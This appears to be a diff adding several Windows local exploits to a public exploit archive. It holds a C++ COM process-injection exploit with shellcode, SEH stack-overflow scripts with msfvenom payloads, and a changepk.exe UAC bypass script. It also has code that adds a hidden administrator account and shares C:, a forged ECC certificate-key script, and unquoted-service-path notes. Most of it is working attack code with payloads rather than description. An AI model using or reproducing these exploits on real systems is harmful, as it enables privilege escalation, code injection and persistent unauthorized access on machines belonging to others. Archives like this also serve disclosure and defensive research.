+            uint64_t _Dummy1 : 32;
+            uint64_t ServerPid : 16;
+        };
+    };
+
+    uint64_t IfacePointerIdHigh;
+};
+
+int main() {
+
+    //
+    // Initialize COM.
+    //
+
+    HRESULT Hr = CoInitialize(nullptr);
+    if(FAILED(Hr)) {
+        printf("Failed to initialize COM.\nThis might be the best thing that happened in your life, carry on and never look back.");
+        return EXIT_FAILURE;
+    }
+
+    //
+    // Instantiate an out-of-proc instance of `ICoreShellComServerRegistrar`.
+    //
+
+    CComPtr<ICoreShellComServerRegistrar> ComServerRegistrar;
+    Hr = ComServerRegistrar.CoCreateInstance(
+        CLSID_CoreShellComServerRegistrar,
+        nullptr,
+        CLSCTX_LOCAL_SERVER
+    );
+
+    if(FAILED(Hr)) {
+        printf("You are probably not vulnerable (%08x) bailing out.", Hr);
+        return EXIT_FAILURE;
+    }
+
+    //
+    // We don't use the copy ctor here to avoid leaking the object as the returned
+    // stream already has its refcount bumped by `SHCreateMemStream`.
+    //
+
+    CComPtr<IStream> Stream;
+    Stream.Attach(SHCreateMemStream(nullptr, 0));
+
+    //
+    // Get the marshalled data for the `ICoreShellComServerRegistrar` interface, so
+    // that we can extract the PID of the COM server (sihost.exe) in this case.
+    // https://twitter.com/tiraniddo/status/1208073552282488833
+    //
+
+    Hr = CoMarshalInterface(
+        Stream,
+        __uuidof(ICoreShellComServerRegistrar),
+        ComServerRegistrar,
+        MSHCTX_LOCAL,
+        nullptr,
+        MSHLFLAGS_NORMAL
+    );
+
+    if(FAILED(Hr)) {
+        printf("Failed to marshal the interface (%08x) bailing out.", Hr);
+        return EXIT_FAILURE;
+    }
+
+    //
+    // Read the PID out of the blob now.
+    //
+
+    const LARGE_INTEGER Origin {};
+    Hr = Stream->Seek(Origin, STREAM_SEEK_SET, nullptr);
+
+    uint8_t Buffer[0x1000] {};
+    Hr = Stream->Read(Buffer, sizeof(Buffer), nullptr);
+
+    union {
+        Marshalled_t *Blob;
+        void *Raw;
+    } Ptr;
+
+    Ptr.Raw = Buffer;
+    const uint32_t SihostPid = Ptr.Blob->ServerPid;
+
+    //
+    // Ready to get a `PROCESS_ALL_ACCESS` handle to the server now!
+    //
+
+    HANDLE ProcessHandle;
+    Hr = ComServerRegistrar->OpenProcess(
+        PROCESS_ALL_ACCESS,
+        false,
+        SihostPid,
+        GetCurrentProcessId(),
+        &ProcessHandle
+    );
+
+    if(FAILED(Hr)) {
+        printf("Failed to OpenProcess (%08x) bailing out.", Hr);
+        return EXIT_FAILURE;
+    }
+
+    //
+    // Allocate executable memory in the target.
+    //
+
+    const auto ShellcodeAddress = LPTHREAD_START_ROUTINE(VirtualAllocEx(
+        ProcessHandle,
+        nullptr,
+        0x1000,
+        MEM_COMMIT | MEM_RESERVE,
+        PAGE_EXECUTE_READWRITE
+    ));
+
+    if(ShellcodeAddress == nullptr) {
+        printf("Failed to VirtualAllocEx memory in the target process (%d) bailing out.", GetLastError());
+        return EXIT_FAILURE;
+    }
+
+    //
+    // This is a CreateProcess(calc) shellcode generated with scc, see payload.cc.
+    //
+
+    const uint8_t Shellcode[] {
+        0x48, 0x83, 0xc4, 0x08, 0x48, 0x83, 0xe4, 0xf0, 0x48, 0x83, 0xec, 0x08, 0x55, 0x48, 0x8b, 0xec,
+        0x48, 0x8d, 0x64, 0x24, 0xf0, 0x48, 0x8d, 0x05, 0x42, 0x02, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf0,
+        0x6a, 0x00, 0x8f, 0x45, 0xf8, 0x48, 0x8d, 0x05, 0x3a, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x08, 0x48,
+        0x8d, 0x55, 0xf0, 0xe8, 0x63, 0x01, 0x00, 0x00, 0xe8, 0xbf, 0x01, 0x00, 0x00, 0xc9, 0xc3, 0x53,
+        0x56, 0x57, 0x41, 0x54, 0x55, 0x48, 0x8b, 0xec, 0x6a, 0x60, 0x58, 0x65, 0x48, 0x8b, 0x00, 0x48,
+        0x8b, 0x40, 0x18, 0x48, 0x8b, 0x70, 0x10, 0x48, 0x8b, 0x46, 0x30, 0x48, 0x83, 0xf8, 0x00, 0x74,
+        0x13, 0xeb, 0x08, 0x4c, 0x8b, 0x06, 0x49, 0x8b, 0xf0, 0xeb, 0xec, 0x45, 0x33, 0xdb, 0x66, 0x45,
+        0x33, 0xd2, 0xeb, 0x09, 0x33, 0xc0, 0xc9, 0x41, 0x5c, 0x5f, 0x5e, 0x5b, 0xc3, 0x66, 0x8b, 0x46,
+        0x58, 0x66, 0x44, 0x3b, 0xd0, 0x72, 0x11, 0xeb, 0x3c, 0x66, 0x45, 0x8b, 0xc2, 0x66, 0x41, 0x83,
+        0xc0, 0x02, 0x66, 0x45, 0x8b, 0xd0, 0xeb, 0xe5, 0x45, 0x8b, 0xcb, 0x41, 0xc1, 0xe9, 0x0d, 0x41,
+        0x8b, 0xc3, 0xc1, 0xe0, 0x13, 0x44, 0x0b, 0xc8, 0x41, 0x8b, 0xc1, 0x4c, 0x8b, 0x46, 0x60, 0x45,
+        0x0f, 0xb7, 0xca, 0x4d, 0x03, 0xc1, 0x45, 0x8a, 0x00, 0x45, 0x0f, 0xbe, 0xc0, 0x41, 0x83, 0xf8,
+        0x61, 0x72, 0x15, 0xeb, 0x07, 0x41, 0x3b, 0xcb, 0x74, 0x16, 0xeb, 0x97, 0x41, 0x83, 0xe8, 0x20,
+        0x41, 0x03, 0xc0, 0x44, 0x8b, 0xd8, 0xeb, 0xb1, 0x41, 0x03, 0xc0, 0x44, 0x8b, 0xd8, 0xeb, 0xa9,
+        0x4c, 0x8b, 0x56, 0x30, 0x41, 0x8b, 0x42, 0x3c, 0x4d, 0x8b, 0xe2, 0x4c, 0x03, 0xe0, 0x41, 0x8b,
+        0x84, 0x24, 0x88, 0x00, 0x00, 0x00, 0x4d, 0x8b, 0xca, 0x4c, 0x03, 0xc8, 0x45, 0x33, 0xdb, 0x41,
+        0x8b, 0x41, 0x18, 0x44, 0x3b, 0xd8, 0x72, 0x0b, 0xe9, 0x56, 0xff, 0xff, 0xff, 0x41, 0x83, 0xc3,
+        0x01, 0xeb, 0xec, 0x41, 0x8b, 0x41, 0x20, 0x49, 0x8b, 0xda, 0x48, 0x03, 0xd8, 0x45, 0x8b, 0xc3,
+        0x48, 0x8b, 0xc3, 0x4a, 0x8d, 0x04, 0x80, 0x8b, 0x00, 0x49, 0x8b, 0xfa, 0x48, 0x03, 0xf8, 0x33,
+        0xc0, 0x48, 0x8b, 0xdf, 0x48, 0x83, 0xc7, 0x01, 0x44, 0x8a, 0x03, 0x41, 0x0f, 0xbe, 0xd8, 0x83,
+        0xfb, 0x00, 0x74, 0x02, 0xeb, 0x06, 0x3b, 0xd0, 0x74, 0x17, 0xeb, 0xc1, 0x44, 0x8b, 0xc0, 0x41,
+        0xc1, 0xe8, 0x0d, 0xc1, 0xe0, 0x13, 0x44, 0x0b, 0xc0, 0x44, 0x03, 0xc3, 0x41, 0x8b, 0xc0, 0xeb,
+        0xd0, 0x41, 0x8b, 0x41, 0x1c, 0x49, 0x8b, 0xd2, 0x48, 0x03, 0xd0, 0x41, 0x8b, 0x41, 0x24, 0x4d,
+        0x8b, 0xca, 0x4c, 0x03, 0xc8, 0x45, 0x8b, 0xc3, 0x49, 0x8b, 0xc1, 0x4a, 0x8d, 0x04, 0x40, 0x66,
+        0x8b, 0x00, 0x0f, 0xb7, 0xc8, 0x48, 0x8b, 0xc2, 0x48, 0x8d, 0x04, 0x88, 0x8b, 0x00, 0x4c, 0x03,
+        0xd0, 0x49, 0x8b, 0xc2, 0xc9, 0x41, 0x5c, 0x5f, 0x5e, 0x5b, 0xc3, 0x53, 0x56, 0x57, 0x41, 0x54,
+        0x55, 0x48, 0x8b, 0xec, 0x48, 0x8b, 0xf1, 0x48, 0x8b, 0xda, 0x48, 0x8b, 0x03, 0x48, 0x83, 0xf8,
+        0x00, 0x74, 0x0e, 0x48, 0x8b, 0xc6, 0x48, 0x83, 0xc6, 0x04, 0x44, 0x8b, 0x20, 0x33, 0xff, 0xeb,
+        0x07, 0xc9, 0x41, 0x5c, 0x5f, 0x5e, 0x5b, 0xc3, 0x8b, 0x06, 0x41, 0x8b, 0xcc, 0x8b, 0xd0, 0xe8,
+        0x6b, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0xd0, 0x48, 0x83, 0xfa, 0x00, 0x74, 0x02, 0xeb, 0x06, 0x48,
+        0x83, 0xc3, 0x08, 0xeb, 0xc5, 0x48, 0x8b, 0x03, 0x48, 0x8b, 0xcf, 0x48, 0x83, 0xc7, 0x01, 0x48,
+        0x8d, 0x04, 0xc8, 0x48, 0x89, 0x10, 0x48, 0x83, 0xc6, 0x04, 0xeb, 0xcc, 0x57, 0x55, 0x48, 0x8b,
+        0xec, 0x48, 0x8d, 0xa4, 0x24, 0x78, 0xff, 0xff, 0xff, 0x48, 0x8d, 0xbd, 0x78, 0xff, 0xff, 0xff,
+        0x32, 0xc0, 0x6a, 0x68, 0x59, 0xf3, 0xaa, 0xc7, 0x85, 0x78, 0xff, 0xff, 0xff, 0x68, 0x00, 0x00,
+        0x00, 0x48, 0x8d, 0x05, 0x4a, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x10, 0x4c, 0x8d, 0x95, 0x78, 0xff,
+        0xff, 0xff, 0x48, 0x8d, 0x45, 0xe0, 0x33, 0xc9, 0x45, 0x33, 0xc0, 0x45, 0x33, 0xc9, 0x50, 0x41,
+        0x52, 0x6a, 0x00, 0x6a, 0x00, 0x6a, 0x00, 0x6a, 0x00, 0x48, 0x8d, 0x64, 0x24, 0xe0, 0x48, 0x8d,
+        0x05, 0x09, 0x00, 0x00, 0x00, 0xff, 0x10, 0x48, 0x83, 0xc4, 0x50, 0xc9, 0x5f, 0xc3, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x17, 0xca, 0x2b, 0x6e, 0x72, 0xfe, 0xb3, 0x16, 0x00, 0x00,
+        0x00, 0x00, 0x63, 0x61, 0x6c, 0x63, 0x00
+    };
+
+    if(!WriteProcessMemory(
+        ProcessHandle,
+        ShellcodeAddress,
+        Shellcode,
+        sizeof(Shellcode),
+        nullptr
+    )) {
+        printf("Failed to WriteProcessMemory in the target process (%d) bailing out.", GetLastError());
+
+        //
+        // At least clean up the remote process D:
+        //
+
+        VirtualFreeEx(ProcessHandle, ShellcodeAddress, 0, MEM_RELEASE);
+        return EXIT_FAILURE;
+    }
+
+    //
+    // Creating a remote thread on the shellcode now.
+    //
+
+    DWORD ThreadId;
+    HANDLE ThreadHandle = CreateRemoteThread(
+        ProcessHandle,
+        nullptr,
+        0,
+        ShellcodeAddress,
+        nullptr,
+        0,
+        &ThreadId
+    );
+
+    //
+    // Waiting for the thread to end..
+    //
+
+    WaitForSingleObject(ThreadHandle, INFINITE);
+
+    //
+    // All right, we are done here, let's clean up and exit.
+    //
+
+    VirtualFreeEx(ProcessHandle, ShellcodeAddress, 0, MEM_RELEASE);
+    printf("Payload has been successfully injected in %d.", SihostPid);
+    return EXIT_SUCCESS;
+}
\ No newline at end of file
diff --git a/exploits/windows/local/47883.txt b/exploits/windows/local/47883.txt
new file mode 100644
index 000000000..bf1fbdd4e
--- /dev/null
+++ b/exploits/windows/local/47883.txt
@@ -0,0 +1,18 @@
+# Exploit Title: AnyDesk 5.4.0 - Unquoted Service Path
+# Exploit Author: SajjadBnd
+# Date: 2019-12-23
+# Vendor Homepage: http://anydesk.com
+# Software Link: https://download.anydesk.com/AnyDesk.exe
+# Version: Software Version 5.4.0
+# Tested on: Win10 x64
+
+SERVICE_NAME: AnyDesk
+         TYPE              : 10  WIN32_OWN_PROCESS
+         START_TYPE        : 2   AUTO_START
+         ERROR_CONTROL     : 1   NORMAL
+         BINARY_PATH_NAME  : "C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service
+         LOAD_ORDER_GROUP  :
+         TAG               : 0
+         DISPLAY_NAME      : AnyDesk Service
+         DEPENDENCIES      : RpcSs
+         SERVICE_START_NAME: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/47897.txt b/exploits/windows/local/47897.txt
new file mode 100644
index 000000000..c88ef3dc4
--- /dev/null
+++ b/exploits/windows/local/47897.txt
@@ -0,0 +1,35 @@
+# Exploit Title: TotalAV 2020 4.14.31 - Privilege Escalation
+# Date: 2020-01-09
+# Exploit Author: Kusol Watchara-Apanukorn
+# Vendor Homepage: https://www.totalav.com/
+# Version: 4.14.31
+# Fixed on:  5.3.35
+# Tested on: Windows 10 x64
+# CVE : CVE-2019-18194
+
+# Vulnerability Description:
+# TotalAV 2020 4.14.31 has quarantine flaw that allows attacker escape of
+# privilege by using NTFS directory junction.
+
+**You can download vulnerability version with this link:
+https://install.protected.net/windows/cdn3/4.14.31/TotalAV_Setup.exe
+
+///////////////////////////////////
+   Proof of Concept
+//////////////////////////////////
+1. Plant the malicious file in this case we use DLL file
+2. To exploit the vulnerability antivirus must detect the malicious dll
+3. Move it to quarantine.
+4. Attacker must create NTFS directory junction to restore
+
+Full step: https://www.youtube.com/watch?v=88qeaLq98Gc
+
+
+Vulnerability Disclosure Timeline:
+==================================
+17 Oct, 19 : Found Vulnerability
+18 Oct, 19 : Vendor Notification
+18 Oct, 19 : Request CVE
+21 Oct, 19 : Vendor Response
+mid Dec, 19  : Vendor released new patched (v5.3.35)
+09 Jan, 20: Vulnerability Disclosure
\ No newline at end of file
diff --git a/exploits/windows/local/47905.txt b/exploits/windows/local/47905.txt
new file mode 100644
index 000000000..4fe0e2de7
--- /dev/null
+++ b/exploits/windows/local/47905.txt
@@ -0,0 +1,47 @@
+# Exploit Title: Advanced System Repair Pro 1.9.1.7 - Insecure File Permissions
+# Exploit Author: ZwX
+# Exploit Date: 2020-01-12
+# Vendor Homepage : https://advancedsystemrepair.com/
+# Software Link: http://advancedsystemrepair.com/ASRProInstaller.exe
+# Tested on OS: Windows 10
+
+
+# Proof of Concept (PoC):
+==========================
+
+C:\Program Files\Advanced System Repair Pro 1.9.1.7.0>icacls *.exe
+AdvancedSystemRepairPro.exe Everyone:(F)
+                            AUTORITE NT\Système:(I)(F)
+                            BUILTIN\Administrateurs:(I)(F)
+                            BUILTIN\Utilisateurs:(I)(RX)
+							
+dsutil.exe Everyone:(F)
+           AUTORITE NT\Système:(I)(F)
+           BUILTIN\Administrateurs:(I)(F)
+           BUILTIN\Utilisateurs:(I)(RX)
+		   
+tscmon.exe Everyone:(F)
+           AUTORITE NT\Système:(I)(F)
+           BUILTIN\Administrateurs:(I)(F)
+           BUILTIN\Utilisateurs:(I)(RX)
+							
+		 
+#Exploit code(s): 
+=================
+
+1) Compile below 'C' code name it as "AdvancedSystemRepairPro.exe"
+
+#include<windows.h>
+
+int main(void){
+ system("net user hacker abc123 /add");
+ system("net localgroup Administrators hacker  /add");
+ system("net share SHARE_NAME=c:\ /grant:hacker,full");
+ WinExec("C:\\Program Files\\Advanced System Repair Pro 1.9.1.7.0\\~AdvancedSystemRepairPro.exe",0);
+return 0;
+} 
+
+2) Rename original "AdvancedSystemRepairPro.exe" to "~AdvancedSystemRepairPro.exe"
+3) Place our malicious "AdvancedSystemRepairPro.exe" in the Advanced System Repair Pro 1.9.1.7.0 directory
+4) Disconnect and wait for a more privileged user to connect and use AdvancedSystemRepairPro IDE. 
+Privilege Successful Escalation
\ No newline at end of file
diff --git a/exploits/windows/local/47908.py b/exploits/windows/local/47908.py
new file mode 100755
index 000000000..40ed6db4d
--- /dev/null
+++ b/exploits/windows/local/47908.py
@@ -0,0 +1,51 @@
+# Exploit Title: Allok Video Converter 4.6.1217 - Stack Overflow (SEH)
+# Date: 2020-01-12
+# Exploit Author: Antonio de la Piedra
+# Vendor Homepage: https://www.alloksoft.com
+# Software Link: https://www.alloksoft.com/allok_vconverter.exe
+# Version: 4.6.1217
+# Tested on: Windows 7 SP1 32-bit
+
+# Copy paste the contents of poc.txt into the License Name input field
+# of Allok Video Converter 4.6.1217 to execute calc.exe.
+
+nseh_offset = 780
+total = 1000
+
+# msfvenom -p windows/exec -b '\x00\x0a\x0d' -f python --var-name shellcode=
+_calc CMD=calc.exe EXITFUNC=thread
+shellcode_calc =  b""
+shellcode_calc += b"\xdd\xc0\xbe\x48\x33\xfd\x23\xd9\x74\x24"
+shellcode_calc += b"\xf4\x5f\x33\xc9\xb1\x31\x83\xef\xfc\x31"
+shellcode_calc += b"\x77\x14\x03\x77\x5c\xd1\x08\xdf\xb4\x97"
+shellcode_calc += b"\xf3\x20\x44\xf8\x7a\xc5\x75\x38\x18\x8d"
+shellcode_calc += b"\x25\x88\x6a\xc3\xc9\x63\x3e\xf0\x5a\x01"
+shellcode_calc += b"\x97\xf7\xeb\xac\xc1\x36\xec\x9d\x32\x58"
+shellcode_calc += b"\x6e\xdc\x66\xba\x4f\x2f\x7b\xbb\x88\x52"
+shellcode_calc += b"\x76\xe9\x41\x18\x25\x1e\xe6\x54\xf6\x95"
+shellcode_calc += b"\xb4\x79\x7e\x49\x0c\x7b\xaf\xdc\x07\x22"
+shellcode_calc += b"\x6f\xde\xc4\x5e\x26\xf8\x09\x5a\xf0\x73"
+shellcode_calc += b"\xf9\x10\x03\x52\x30\xd8\xa8\x9b\xfd\x2b"
+shellcode_calc += b"\xb0\xdc\x39\xd4\xc7\x14\x3a\x69\xd0\xe2"
+shellcode_calc += b"\x41\xb5\x55\xf1\xe1\x3e\xcd\xdd\x10\x92"
+shellcode_calc += b"\x88\x96\x1e\x5f\xde\xf1\x02\x5e\x33\x8a"
+shellcode_calc += b"\x3e\xeb\xb2\x5d\xb7\xaf\x90\x79\x9c\x74"
+shellcode_calc += b"\xb8\xd8\x78\xda\xc5\x3b\x23\x83\x63\x37"
+shellcode_calc += b"\xc9\xd0\x19\x1a\x87\x27\xaf\x20\xe5\x28"
+shellcode_calc += b"\xaf\x2a\x59\x41\x9e\xa1\x36\x16\x1f\x60"
+shellcode_calc += b"\x73\xf8\xfd\xa1\x89\x91\x5b\x20\x30\xfc"
+shellcode_calc += b"\x5b\x9e\x76\xf9\xdf\x2b\x06\xfe\xc0\x59"
+shellcode_calc += b"\x03\xba\x46\xb1\x79\xd3\x22\xb5\x2e\xd4"
+shellcode_calc += b"\x66\xd6\xb1\x46\xea\x37\x54\xef\x89\x47"
+
+poc = ""
+poc += "A"*nseh_offset
+poc += "\xEB\x0b\x90\x90"   # jmp forward (nseh)
+poc +=  "\x59\x78\x03\x10"  # pop pop ret (seh)
+poc += "\x90"*20
+poc += shellcode_calc
+poc += "D"*(total - len(poc))
+
+file = open("poc_seh.txt","w")
+file.write(poc)
+file.close()
\ No newline at end of file
diff --git a/exploits/windows/local/47910.py b/exploits/windows/local/47910.py
new file mode 100755
index 000000000..a8b593f46
--- /dev/null
+++ b/exploits/windows/local/47910.py
@@ -0,0 +1,52 @@
+# Exploit Title: Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 - Stack Overflow (SEH)
+# Date: 2020-01-12
+# Exploit Author: Antonio de la Piedra
+# Vendor Homepage: https://www.alloksoft.com
+# Software Link: https://www.alloksoft.com/allok_rmconverter.exe
+# Version: 3.6.1217
+# Tested on: Windows 7 SP1 32-bit
+
+# Copy paste the contents of poc_seh.txt into the License Name input field
+# of  Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 to execute calc.exe.
+
+#!/usr/bin/python
+
+nseh_offset = 780
+total = 1000
+
+#  msfvenom -p windows/exec -b '\x00\x0a\x0d' -f python --var-name shellcode_calc CMD=calc.exe EXITFUNC=thread
+shellcode_calc =  b""
+shellcode_calc += b"\xdd\xc0\xbe\x48\x33\xfd\x23\xd9\x74\x24"
+shellcode_calc += b"\xf4\x5f\x33\xc9\xb1\x31\x83\xef\xfc\x31"
+shellcode_calc += b"\x77\x14\x03\x77\x5c\xd1\x08\xdf\xb4\x97"
+shellcode_calc += b"\xf3\x20\x44\xf8\x7a\xc5\x75\x38\x18\x8d"
+shellcode_calc += b"\x25\x88\x6a\xc3\xc9\x63\x3e\xf0\x5a\x01"
+shellcode_calc += b"\x97\xf7\xeb\xac\xc1\x36\xec\x9d\x32\x58"
+shellcode_calc += b"\x6e\xdc\x66\xba\x4f\x2f\x7b\xbb\x88\x52"
+shellcode_calc += b"\x76\xe9\x41\x18\x25\x1e\xe6\x54\xf6\x95"
+shellcode_calc += b"\xb4\x79\x7e\x49\x0c\x7b\xaf\xdc\x07\x22"
+shellcode_calc += b"\x6f\xde\xc4\x5e\x26\xf8\x09\x5a\xf0\x73"
+shellcode_calc += b"\xf9\x10\x03\x52\x30\xd8\xa8\x9b\xfd\x2b"
+shellcode_calc += b"\xb0\xdc\x39\xd4\xc7\x14\x3a\x69\xd0\xe2"
+shellcode_calc += b"\x41\xb5\x55\xf1\xe1\x3e\xcd\xdd\x10\x92"
+shellcode_calc += b"\x88\x96\x1e\x5f\xde\xf1\x02\x5e\x33\x8a"
+shellcode_calc += b"\x3e\xeb\xb2\x5d\xb7\xaf\x90\x79\x9c\x74"
+shellcode_calc += b"\xb8\xd8\x78\xda\xc5\x3b\x23\x83\x63\x37"
+shellcode_calc += b"\xc9\xd0\x19\x1a\x87\x27\xaf\x20\xe5\x28"
+shellcode_calc += b"\xaf\x2a\x59\x41\x9e\xa1\x36\x16\x1f\x60"
+shellcode_calc += b"\x73\xf8\xfd\xa1\x89\x91\x5b\x20\x30\xfc"
+shellcode_calc += b"\x5b\x9e\x76\xf9\xdf\x2b\x06\xfe\xc0\x59"
+shellcode_calc += b"\x03\xba\x46\xb1\x79\xd3\x22\xb5\x2e\xd4"
+shellcode_calc += b"\x66\xd6\xb1\x46\xea\x37\x54\xef\x89\x47"
+
+poc = ""
+poc += "A"*nseh_offset
+poc += "\xEB\x0b\x90\x90"   # jmp forward (nseh)
+poc +=  "\x11\x7b\x03\x10"  # pop pop ret (seh)
+poc += "\x90"*20
+poc += shellcode_calc
+poc += "D"*(total - len(poc))
+
+file = open("poc_seh.txt","w")
+file.write(poc)
+file.close()
\ No newline at end of file
diff --git a/exploits/windows/local/47915.py b/exploits/windows/local/47915.py
new file mode 100755
index 000000000..4c0395891
--- /dev/null
+++ b/exploits/windows/local/47915.py
@@ -0,0 +1,97 @@
+# Exploit Title: Microsoft Windows 10 - Local Privilege Escalation (UAC Bypass)
+# Author: Nassim Asrir
+# Date: 2019-01-10
+# Exploit Author: Nassim Asrir
+# CVE: N/A
+# Tested On: Windows 10Pro 1809
+# Vendor : https://www.microsoft.com
+
+# Technical Details
+
+# I discovered a Local Privilege Escalation in Windows 10 (UAC Bypass), via an auto-elevated process.
+# The executable is changepk.exe. changepk is used to pass a new product key, you can pass the key also via commandline.
+# By executing changepk.exe and tracing the process we can see some RegOpenKey operations that lead to open some non-found Key in the registry (HKCU).
+# In our case we can use "HKCU:\Software\Classes\Launcher.SystemSettings\Shell\Open\Command" to spawn our Administrator cmd or to bypass the mmc UAC.
+
+# ntoskrnl.exe	ObOpenObjectByNameEx + 0x32db	0xfffff8073106270b	C:\WINDOWS\system32\ntoskrnl.exe
+# ntoskrnl.exe	RtlMapGenericMask + 0x2548	0xfffff80731090118	C:\WINDOWS\system32\ntoskrnl.exe
+# ntoskrnl.exe	ObOpenObjectByNameEx + 0x1bd9	0xfffff80731061009	C:\WINDOWS\system32\ntoskrnl.exe
+# ntoskrnl.exe	ObOpenObjectByNameEx + 0x1df	0xfffff8073105f60f	C:\WINDOWS\system32\ntoskrnl.exe
+# ntoskrnl.exe	SeCaptureSubjectContextEx + 0x7c8	0xfffff8073105dc98	C:\WINDOWS\system32\ntoskrnl.exe
+# ntoskrnl.exe	SeCaptureSubjectContextEx + 0x51f	0xfffff8073105d9ef	C:\WINDOWS\system32\ntoskrnl.exe
+# ntoskrnl.exe	setjmpex + 0x78e5	0xfffff80730bd9c05	C:\WINDOWS\system32\ntoskrnl.exe
+# ntdll.dll	ZwOpenKeyEx + 0x14	0x7ff877501a94	C:\Windows\System32\ntdll.dll
+# KernelBase.dll	RegEnumKeyExW + 0x4c5	0x7ff874161655	C:\Windows\System32\KernelBase.dll
+# KernelBase.dll	MapPredefinedHandleInternal + 0xca5	0x7ff874162fb5	C:\Windows\System32\KernelBase.dll
+# KernelBase.dll	RegOpenKeyExInternalW + 0x141	0x7ff874161fa1	C:\Windows\System32\KernelBase.dll
+# KernelBase.dll	RegOpenKeyExW + 0x19	0x7ff874161e49	C:\Windows\System32\KernelBase.dll
+# SHCore.dll	SHGetValueW + 0x8c	0x7ff87469bfcc	C:\Windows\System32\SHCore.dll
+# shell32.dll	Ordinal790 + 0xb282	0x7ff87532fd22	C:\Windows\System32\shell32.dll
+# shell32.dll	Ordinal790 + 0xad56	0x7ff87532f7f6	C:\Windows\System32\shell32.dll
+# shell32.dll	SHChangeNotification_Lock + 0x2b8	0x7ff8753a2a58	C:\Windows\System32\shell32.dll
+# shell32.dll	Ordinal790 + 0xb0cb	0x7ff87532fb6b	C:\Windows\System32\shell32.dll
+# shell32.dll	Ordinal790 + 0xa254	0x7ff87532ecf4	C:\Windows\System32\shell32.dll
+# shell32.dll	Ordinal790 + 0xa7c6	0x7ff87532f266	C:\Windows\System32\shell32.dll
+# shell32.dll	Shell_NotifyIconW + 0x1695	0x7ff875349c75	C:\Windows\System32\shell32.dll
+# shell32.dll	SHGetFileInfoW + 0x18a5	0x7ff87536a8c5	C:\Windows\System32\shell32.dll
+# shell32.dll	SignalFileOpen + 0x33b	0x7ff8753a140b	C:\Windows\System32\shell32.dll
+# shell32.dll	SignalFileOpen + 0x25b	0x7ff8753a132b	C:\Windows\System32\shell32.dll
+# shell32.dll	Ordinal99 + 0x9c6	0x7ff87534ff96	C:\Windows\System32\shell32.dll
+# shell32.dll	SHGetSpecialFolderLocation + 0x28e	0x7ff8753bac5e	C:\Windows\System32\shell32.dll
+# SHCore.dll	Ordinal233 + 0x3c5	0x7ff8746ac315	C:\Windows\System32\SHCore.dll
+# kernel32.dll	BaseThreadInitThunk + 0x14	0x7ff875087974	C:\Windows\System32\kernel32.dll
+# ntdll.dll	RtlUserThreadStart + 0x21	0x7ff8774ca271	C:\Windows\System32\ntdll.dll
+
+
+# Exploit
+# To exploit the vulnerability you can use this python code then execute it and you will get the Windows Activation just click Yes and you will redirect the execution to cmd.exe.
+
+# -*- coding: utf-8 -*-
+import os
+import sys
+import ctypes
+import _winreg
+import time
+
+print "Creating Registry Key ....."
+print ""
+time.sleep(3)
+def create_reg_key(key, value):
+
+    try:  
+        _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\Launcher.SystemSettings\Shell\Open\Command')
+        registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\Launcher.SystemSettings\Shell\Open\Command', 0, _winreg.KEY_WRITE)                
+        _winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)        
+        _winreg.CloseKey(registry_key)
+    except WindowsError:        
+        raise
+
+print "Registry Key Created :)"
+print ""
+print "Inserting the command ...."
+time.sleep(3)
+print ""
+def exec_bypass_uac(cmd):
+    try:
+        create_reg_key('DelegateExecute', '')
+        create_reg_key(None, cmd)    
+    except WindowsError:
+        raise
+
+def bypass_uac():     
+ try:                
+    current_dir = os.path.dirname(os.path.realpath(__file__)) + '\\' + __file__
+    cmd = "C:\windows\System32\cmd.exe"
+    exec_bypass_uac(cmd)                
+    os.system(r'C:\windows\system32\changepk.exe')  
+    return 1               
+ except WindowsError:
+    sys.exit(1)       
+
+if __name__ == '__main__':
+
+    if bypass_uac():
+        print "Good job you got your Administrator cmd :)"
+
+
+# Don't Fogot:  reg delete "HKCU\Software\Classes\Launcher.SystemSettings\Shell\Open\Command" /f
\ No newline at end of file
diff --git a/exploits/windows/local/47916.txt b/exploits/windows/local/47916.txt
new file mode 100644
index 000000000..e2e3bb8fc
--- /dev/null
+++ b/exploits/windows/local/47916.txt
@@ -0,0 +1,21 @@
+# Exploit Title: VPN unlimited 6.1 - Unquoted Service Path
+# Date: 2020-1-13
+# Exploit Author: Amin Rawah
+# Vendor Homepage: https://www.vpnunlimitedapp.com
+# Version: 6.1
+# Tested on: Windows 10 64bit
+
+C:\Users\Amin>sc qc VPNUnlimitedService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: VPNUnlimitedService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\VPN
+Unlimited\vpn-unlimited-daemon.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : VPN Unlimited Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/47933.rb b/exploits/windows/local/47933.rb
new file mode 100755
index 000000000..19f2d24a4
--- /dev/null
+++ b/exploits/windows/local/47933.rb
@@ -0,0 +1,23 @@
+# EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47933.zip
+
+require 'openssl'
+
+raw = File.read "ca.crt"
+ca_cert = OpenSSL::X509::Certificate.new(raw)
+
+# Parse public key from CA
+ca_key = ca_cert.public_key
+if !(ca_key.instance_of? OpenSSL::PKey::EC) then
+    puts "CA NOT ECC"
+    puts "Type: " + key.inspect
+    exit
+end
+
+# Set new group with fake generator G = Q
+ca_key.private_key = 1
+group = ca_key.group
+group.set_generator(ca_key.public_key, group.order, group.cofactor)
+group.asn1_flag = OpenSSL::PKey::EC::EXPLICIT_CURVE
+ca_key.group = group
+
+puts ca_key.to_pem
\ No newline at end of file
diff --git a/exploits/windows/local/47938.py b/exploits/windows/local/47938.py
new file mode 100755
index 000000000..f66e4a357
--- /dev/null
